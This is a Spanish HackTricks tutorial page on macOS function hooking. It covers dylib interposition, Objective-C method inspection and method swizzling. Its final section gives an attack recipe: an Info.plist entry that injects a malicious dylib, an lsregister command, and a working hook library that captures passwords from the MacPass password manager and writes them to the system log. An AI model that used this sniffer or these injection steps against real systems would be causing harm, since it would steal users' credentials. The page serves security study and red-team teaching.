mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-09 19:58:53 +00:00
392 lines
16 KiB
Markdown
392 lines
16 KiB
Markdown
|
# macOS Function Hooking
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Aprende a hackear AWS desde cero hasta convertirte en un experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Otras formas de apoyar a HackTricks:
|
||
|
|
||
|
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Obtén la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## Interposición de Funciones
|
||
|
|
||
|
Crea una **dylib** con una sección **`__interpose`** (o una sección marcada con **`S_INTERPOSING`**) que contenga tuplas de **punteros de funciones** que se refieran a las funciones **originales** y a las **de reemplazo**.
|
||
|
|
||
|
Luego, **inyecta** la dylib con **`DYLD_INSERT_LIBRARIES`** (la interposición debe ocurrir antes de que la aplicación principal se cargue). Obviamente, las [**restricciones** aplicadas al uso de **`DYLD_INSERT_LIBRARIES`** también se aplican aquí](macos-library-injection/#check-restrictions).
|
||
|
|
||
|
### Interponer printf
|
||
|
|
||
|
{% code title="interpose.c" %}
|
||
|
```c
|
||
|
// gcc -dynamiclib interpose.c -o interpose.dylib
|
||
|
#include <stdio.h>
|
||
|
#include <stdarg.h>
|
||
|
|
||
|
int my_printf(const char *format, ...) {
|
||
|
//va_list args;
|
||
|
//va_start(args, format);
|
||
|
//int ret = vprintf(format, args);
|
||
|
//va_end(args);
|
||
|
|
||
|
int ret = printf("Hello from interpose\n");
|
||
|
return ret;
|
||
|
}
|
||
|
|
||
|
__attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf
|
||
|
__attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf };
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
```c
|
||
|
//gcc hello.c -o hello
|
||
|
#include <stdio.h>
|
||
|
|
||
|
int main() {
|
||
|
printf("Hello World!\n");
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
|
||
|
#### Hooking de funciones en macOS
|
||
|
|
||
|
En macOS, se puede realizar el hooking de funciones utilizando la técnica de interposición de funciones. Esto implica la modificación de la tabla de símbolos de enlace dinámico para redirigir las llamadas de una función a otra función personalizada.
|
||
|
|
||
|
**Pasos para realizar el hooking de funciones en macOS:**
|
||
|
|
||
|
1. Crear una biblioteca dinámica con la función personalizada que se utilizará para reemplazar la función original.
|
||
|
2. Compilar la biblioteca dinámica y establecerla como una biblioteca intermedia.
|
||
|
3. Utilizar la variable de entorno `DYLD_INSERT_LIBRARIES` para cargar la biblioteca dinámica en el espacio de direcciones de un proceso.
|
||
|
4. La función personalizada puede realizar acciones adicionales antes o después de llamar a la función original.
|
||
|
|
||
|
Al realizar el hooking de funciones en macOS, es importante tener en cuenta la arquitectura del sistema operativo y la compatibilidad con las versiones específicas de macOS para garantizar que el hooking se realice de manera efectiva y segura.
|
||
|
|
||
|
El hooking de funciones puede ser utilizado para diversos fines, como la depuración de aplicaciones, la monitorización de llamadas de sistema, o la implementación de medidas de seguridad personalizadas. Sin embargo, es fundamental utilizar esta técnica de manera ética y legal.
|
||
|
|
||
|
```c
|
||
|
// Just another way to define an interpose
|
||
|
// gcc -dynamiclib interpose2.c -o interpose2.dylib
|
||
|
|
||
|
#include <stdio.h>
|
||
|
|
||
|
#define DYLD_INTERPOSE(_replacement, _replacee) \
|
||
|
__attribute__((used)) static struct { \
|
||
|
const void* replacement; \
|
||
|
const void* replacee; \
|
||
|
} _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \
|
||
|
(const void*) (unsigned long) &_replacement, \
|
||
|
(const void*) (unsigned long) &_replacee \
|
||
|
};
|
||
|
|
||
|
int my_printf(const char *format, ...)
|
||
|
{
|
||
|
int ret = printf("Hello from interpose\n");
|
||
|
return ret;
|
||
|
}
|
||
|
|
||
|
DYLD_INTERPOSE(my_printf,printf);
|
||
|
```
|
||
|
|
||
|
```bash
|
||
|
DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello
|
||
|
Hello from interpose
|
||
|
|
||
|
DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello
|
||
|
Hello from interpose
|
||
|
```
|
||
|
|
||
|
## Método Swizzling
|
||
|
|
||
|
En ObjectiveC así es como se llama a un método: **`[instanciaMiClase nombreDelMetodoPrimerParam:param1 segundoParam:param2]`**
|
||
|
|
||
|
Se necesita el **objeto**, el **método** y los **parámetros**. Y cuando se llama a un método se envía un **mensaje** utilizando la función **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);`
|
||
|
|
||
|
El objeto es **`someObject`**, el método es **`@selector(method1p1:p2:)`** y los argumentos son **value1**, **value2**.
|
||
|
|
||
|
Siguiendo las estructuras del objeto, es posible llegar a un **array de métodos** donde se encuentran **los nombres** y **los punteros** al código del método.
|
||
|
|
||
|
{% hint style="danger" %}
|
||
|
Ten en cuenta que debido a que los métodos y clases se acceden según sus nombres, esta información se almacena en el binario, por lo que es posible recuperarla con `otool -ov </ruta/bin>` o [`class-dump </ruta/bin>`](https://github.com/nygard/class-dump)
|
||
|
{% endhint %}
|
||
|
|
||
|
### Accediendo a los métodos en bruto
|
||
|
|
||
|
Es posible acceder a la información de los métodos como el nombre, el número de parámetros o la dirección como en el siguiente ejemplo:
|
||
|
|
||
|
```objectivec
|
||
|
// gcc -framework Foundation test.m -o test
|
||
|
|
||
|
#import <Foundation/Foundation.h>
|
||
|
#import <objc/runtime.h>
|
||
|
#import <objc/message.h>
|
||
|
|
||
|
int main() {
|
||
|
// Get class of the variable
|
||
|
NSString* str = @"This is an example";
|
||
|
Class strClass = [str class];
|
||
|
NSLog(@"str's Class name: %s", class_getName(strClass));
|
||
|
|
||
|
// Get parent class of a class
|
||
|
Class strSuper = class_getSuperclass(strClass);
|
||
|
NSLog(@"Superclass name: %@",NSStringFromClass(strSuper));
|
||
|
|
||
|
// Get information about a method
|
||
|
SEL sel = @selector(length);
|
||
|
NSLog(@"Selector name: %@", NSStringFromSelector(sel));
|
||
|
Method m = class_getInstanceMethod(strClass,sel);
|
||
|
NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m));
|
||
|
NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m));
|
||
|
|
||
|
// Iterate through the class hierarchy
|
||
|
NSLog(@"Listing methods:");
|
||
|
Class currentClass = strClass;
|
||
|
while (currentClass != NULL) {
|
||
|
unsigned int inheritedMethodCount = 0;
|
||
|
Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount);
|
||
|
|
||
|
NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount);
|
||
|
|
||
|
for (unsigned int i = 0; i < inheritedMethodCount; i++) {
|
||
|
Method method = inheritedMethods[i];
|
||
|
SEL selector = method_getName(method);
|
||
|
const char* methodName = sel_getName(selector);
|
||
|
unsigned long address = (unsigned long)method_getImplementation(m);
|
||
|
NSLog(@"Inherited method name: %s (0x%lx)", methodName, address);
|
||
|
}
|
||
|
|
||
|
// Free the memory allocated by class_copyMethodList
|
||
|
free(inheritedMethods);
|
||
|
currentClass = class_getSuperclass(currentClass);
|
||
|
}
|
||
|
|
||
|
// Other ways to call uppercaseString method
|
||
|
if([str respondsToSelector:@selector(uppercaseString)]) {
|
||
|
NSString *uppercaseString = [str performSelector:@selector(uppercaseString)];
|
||
|
NSLog(@"Uppercase string: %@", uppercaseString);
|
||
|
}
|
||
|
|
||
|
// Using objc_msgSend directly
|
||
|
NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString));
|
||
|
NSLog(@"Uppercase string: %@", uppercaseString2);
|
||
|
|
||
|
// Calling the address directly
|
||
|
IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address
|
||
|
NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp
|
||
|
NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method
|
||
|
NSLog(@"Uppercase string: %@", uppercaseString3);
|
||
|
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
|
||
|
### Método Swizzling con method\_exchangeImplementations
|
||
|
|
||
|
La función **`method_exchangeImplementations`** permite **cambiar** la **dirección** de la **implementación** de **una función por otra**.
|
||
|
|
||
|
{% hint style="danger" %}
|
||
|
Por lo tanto, cuando se llama a una función, lo que se **ejecuta es la otra**.
|
||
|
{% endhint %}
|
||
|
|
||
|
```objectivec
|
||
|
//gcc -framework Foundation swizzle_str.m -o swizzle_str
|
||
|
|
||
|
#import <Foundation/Foundation.h>
|
||
|
#import <objc/runtime.h>
|
||
|
|
||
|
|
||
|
// Create a new category for NSString with the method to execute
|
||
|
@interface NSString (SwizzleString)
|
||
|
|
||
|
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
|
||
|
|
||
|
@end
|
||
|
|
||
|
@implementation NSString (SwizzleString)
|
||
|
|
||
|
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
|
||
|
NSLog(@"Custom implementation of substringFromIndex:");
|
||
|
|
||
|
// Call the original method
|
||
|
return [self swizzledSubstringFromIndex:from];
|
||
|
}
|
||
|
|
||
|
@end
|
||
|
|
||
|
int main(int argc, const char * argv[]) {
|
||
|
// Perform method swizzling
|
||
|
Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));
|
||
|
Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));
|
||
|
method_exchangeImplementations(originalMethod, swizzledMethod);
|
||
|
|
||
|
// We changed the address of one method for the other
|
||
|
// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex
|
||
|
// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled
|
||
|
|
||
|
// Example usage
|
||
|
NSString *myString = @"Hello, World!";
|
||
|
NSString *subString = [myString substringFromIndex:7];
|
||
|
NSLog(@"Substring: %@", subString);
|
||
|
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
|
||
|
{% hint style="warning" %}
|
||
|
En este caso, si el **código de implementación del método legítimo** verifica el **nombre del método**, podría **detectar** este intercambio y evitar que se ejecute.
|
||
|
|
||
|
La siguiente técnica no tiene esta restricción.
|
||
|
{% endhint %}
|
||
|
|
||
|
### Intercambio de métodos con method\_setImplementation
|
||
|
|
||
|
El formato anterior es extraño porque estás cambiando la implementación de 2 métodos uno por el otro. Usando la función **`method_setImplementation`** puedes **cambiar** la **implementación** de un **método por la de otro**.
|
||
|
|
||
|
Solo recuerda **almacenar la dirección de la implementación del original** si vas a llamarlo desde la nueva implementación antes de sobrescribirla, ya que luego será mucho más complicado localizar esa dirección.
|
||
|
|
||
|
```objectivec
|
||
|
#import <Foundation/Foundation.h>
|
||
|
#import <objc/runtime.h>
|
||
|
#import <objc/message.h>
|
||
|
|
||
|
static IMP original_substringFromIndex = NULL;
|
||
|
|
||
|
@interface NSString (Swizzlestring)
|
||
|
|
||
|
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
|
||
|
|
||
|
@end
|
||
|
|
||
|
@implementation NSString (Swizzlestring)
|
||
|
|
||
|
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
|
||
|
NSLog(@"Custom implementation of substringFromIndex:");
|
||
|
|
||
|
// Call the original implementation using objc_msgSendSuper
|
||
|
return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);
|
||
|
}
|
||
|
|
||
|
@end
|
||
|
|
||
|
int main(int argc, const char * argv[]) {
|
||
|
@autoreleasepool {
|
||
|
// Get the class of the target method
|
||
|
Class stringClass = [NSString class];
|
||
|
|
||
|
// Get the swizzled and original methods
|
||
|
Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:));
|
||
|
|
||
|
// Get the function pointer to the swizzled method's implementation
|
||
|
IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:)));
|
||
|
|
||
|
// Swap the implementations
|
||
|
// It return the now overwritten implementation of the original method to store it
|
||
|
original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP);
|
||
|
|
||
|
// Example usage
|
||
|
NSString *myString = @"Hello, World!";
|
||
|
NSString *subString = [myString substringFromIndex:7];
|
||
|
NSLog(@"Substring: %@", subString);
|
||
|
|
||
|
// Set the original implementation back
|
||
|
method_setImplementation(originalMethod, original_substringFromIndex);
|
||
|
|
||
|
return 0;
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
|
||
|
## Metodología de Ataque de Hooking
|
||
|
|
||
|
En esta página se discutieron diferentes formas de enganchar funciones. Sin embargo, implicaban **ejecutar código dentro del proceso para atacar**.
|
||
|
|
||
|
Para lograrlo, la técnica más fácil de usar es inyectar un [Dyld a través de variables de entorno o secuestrar](macos-library-injection/macos-dyld-hijacking-and-dyld\_insert\_libraries.md). Sin embargo, supongo que esto también se podría hacer a través de [inyección de proceso Dylib](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
|
||
|
|
||
|
Sin embargo, ambas opciones están **limitadas** a **binarios/procesos no protegidos**. Consulta cada técnica para obtener más información sobre las limitaciones.
|
||
|
|
||
|
Sin embargo, un ataque de enganche de funciones es muy específico, un atacante hará esto para **robar información sensible desde dentro de un proceso** (de lo contrario, simplemente harías un ataque de inyección de proceso). Y esta información sensible podría estar ubicada en aplicaciones descargadas por el usuario, como MacPass.
|
||
|
|
||
|
Entonces, el vector del atacante sería encontrar una vulnerabilidad o eliminar la firma de la aplicación, inyectar la variable de entorno **`DYLD_INSERT_LIBRARIES`** a través del Info.plist de la aplicación agregando algo como:
|
||
|
|
||
|
```xml
|
||
|
<key>LSEnvironment</key>
|
||
|
<dict>
|
||
|
<key>DYLD_INSERT_LIBRARIES</key>
|
||
|
<string>/Applications/Application.app/Contents/malicious.dylib</string>
|
||
|
</dict>
|
||
|
```
|
||
|
|
||
|
y luego **volver a registrar** la aplicación:
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Agrega en esa biblioteca el código de enganche para exfiltrar la información: Contraseñas, mensajes...
|
||
|
|
||
|
{% hint style="danger" %}
|
||
|
Ten en cuenta que en las versiones más recientes de macOS, si **eliminas la firma** del binario de la aplicación y esta se ejecutó previamente, macOS **no ejecutará la aplicación** nuevamente.
|
||
|
{% endhint %}
|
||
|
|
||
|
#### Ejemplo de biblioteca
|
||
|
|
||
|
```objectivec
|
||
|
// gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib
|
||
|
|
||
|
// If you added env vars in the Info.plist don't forget to call lsregister as explained before
|
||
|
|
||
|
// Listen to the logs with something like:
|
||
|
// log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"'
|
||
|
|
||
|
#include <Foundation/Foundation.h>
|
||
|
#import <objc/runtime.h>
|
||
|
|
||
|
// Here will be stored the real method (setPassword in this case) address
|
||
|
static IMP real_setPassword = NULL;
|
||
|
|
||
|
static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)
|
||
|
{
|
||
|
// Function that will log the password and call the original setPassword(pass, file_path) method
|
||
|
NSLog(@"[+] Password is: %@", password);
|
||
|
|
||
|
// After logging the password call the original method so nothing breaks.
|
||
|
return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL);
|
||
|
}
|
||
|
|
||
|
// Library constructor to execute
|
||
|
__attribute__((constructor))
|
||
|
static void customConstructor(int argc, const char **argv) {
|
||
|
// Get the real method address to not lose it
|
||
|
Class classMPDocument = NSClassFromString(@"MPDocument");
|
||
|
Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:));
|
||
|
|
||
|
// Make the original method setPassword call the fake implementation one
|
||
|
IMP fake_IMP = (IMP)custom_setPassword;
|
||
|
real_setPassword = method_setImplementation(real_Method, fake_IMP);
|
||
|
}
|
||
|
```
|
||
|
|
||
|
## Referencias
|
||
|
|
||
|
* [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Aprende hacking de AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Equipos Rojos de AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Otras formas de apoyar a HackTricks:
|
||
|
|
||
|
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.
|
||
|
|
||
|
</details>
|